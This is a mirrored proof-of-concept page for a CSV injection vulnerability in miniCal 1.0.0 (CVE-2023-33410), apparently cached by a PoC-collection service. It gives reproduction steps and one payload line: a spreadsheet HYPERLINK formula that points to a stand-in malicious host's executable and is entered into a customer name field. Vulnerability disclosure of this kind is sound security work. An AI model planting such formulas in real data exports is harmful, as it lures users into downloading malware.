CVE-2023-33410 PoC — miniCal 安全漏洞

Source

https://github.com/Thirukrishnan/CVE-2023-33410

Associated Vulnerability

Title:miniCal 安全漏洞 (CVE-2023-33410)
Description:miniCal是miniCal开源的一款开源的 PMS。 miniCal 1.0.0及之前版本存在安全漏洞，该漏洞源于包含CSV注入漏洞，允许攻击者远程执行代码。

Readme

# CVE-2023-33410

Minical 1.0.0 is vulnerable to CSV Injection.

Vendor:                <https://github.com/minical/minical>

Demo Application:  <https://demo.minical.io/>

---

## PoC

Step 1:  Navigate to the Accounting module and click on Create New Customer.

![image](https://github.com/Thirukrishnan/CVE-2023-33410/assets/63901950/02c043e8-4a06-4707-a467-fe5ddcea50ad)


Step 2: Enter the payload in the Name field and Click on Create.

`Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere") `

![image](https://github.com/Thirukrishnan/CVE-2023-33410/assets/63901950/83c5ff61-6d05-42fd-ac38-92587e5944a5)

![image](https://github.com/Thirukrishnan/CVE-2023-33410/assets/63901950/2d4fc808-aa01-4fea-9903-5f72bd86da4e)

Step 3: Click on Download CSV Report and Observe the payload getting rendered.

![image](https://github.com/Thirukrishnan/CVE-2023-33410/assets/63901950/10a38894-0885-4981-868e-0e6a39b441ef)

File Snapshot


 [4.0K]  /data/pocs/603e5d873ba113f064e6860214f82743a842ebb3
└── [ 935]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!